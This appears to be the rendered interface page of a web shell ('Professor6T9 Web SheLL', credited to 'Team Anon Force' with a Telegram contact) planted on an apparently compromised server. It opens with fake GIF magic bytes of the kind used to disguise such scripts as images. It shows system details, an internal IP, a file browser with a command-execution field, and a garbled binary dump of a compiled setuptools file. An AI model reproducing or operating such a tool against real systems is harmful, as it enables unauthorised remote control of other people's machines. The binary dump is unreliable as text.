GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
setuptools
/
command
/
__pycache__
[ HOME ]
Exec
Submit
dist_info.cpython-38.pyc
U �}�h� � @ s� d Z ddlZddlZddlmZ ddlmZ ddlmZ ddl m Z ddlmZ dd l mZ d dlmZ G dd � d e�Zdd� ZdS )zD Create a dist_info directory As defined in the wheel specification � N)�contextmanager)�log)�Command)�Path)�cast� )�_normalization� )�egg_infoc @ s^ e Zd ZdZdZdddddgZdd gZd diZdd� Zd d� Z e eed�dd��Z dd� ZdS )� dist_infoz� This command is private and reserved for internal use of setuptools, users should rely on ``setuptools.build_meta`` APIs. z@DO NOT CALL DIRECTLY, INTERNAL ONLY: create .dist-info directory)zoutput-dir=�ozYdirectory inside of which the .dist-info will becreated [default: top of the source tree])�tag-date�dz0Add date stamp (e.g. 20050528) to version number)z tag-build=�bz-Specify explicit tag to add to version number)�no-date�Dz"Don't include date stamp [default])� keep-egg-infoNz,*TRANSITIONAL* will be removed in the futurer r r c C s( d | _ d | _d | _d | _d | _d| _d S )NF)� output_dir�name� dist_info_dir�tag_date� tag_build� keep_egg_info)�self� r �C/tmp/pip-target-k_nuic9h/lib/python/setuptools/command/dist_info.py�initialize_options* s zdist_info.initialize_optionsc C s� | j }|jptj}t| jp|�| _tt| �d��}t | j�|_ | jrN| j|_n|j| _| jrf| j|_n|j| _|� � || _t�|�� �}t�|�� �}|� d|� �| _tj�| j| j� d��| _d S )Nr �-z .dist-info)�distributionZsrc_root�os�curdirr r r �egg_info_cls�reinitialize_command�strZegg_baser r �finalize_optionsr r Z safer_name�get_nameZsafer_best_effort_version�get_versionr �path�joinr )r �distZproject_dirr r �versionr r r r$ 2 s"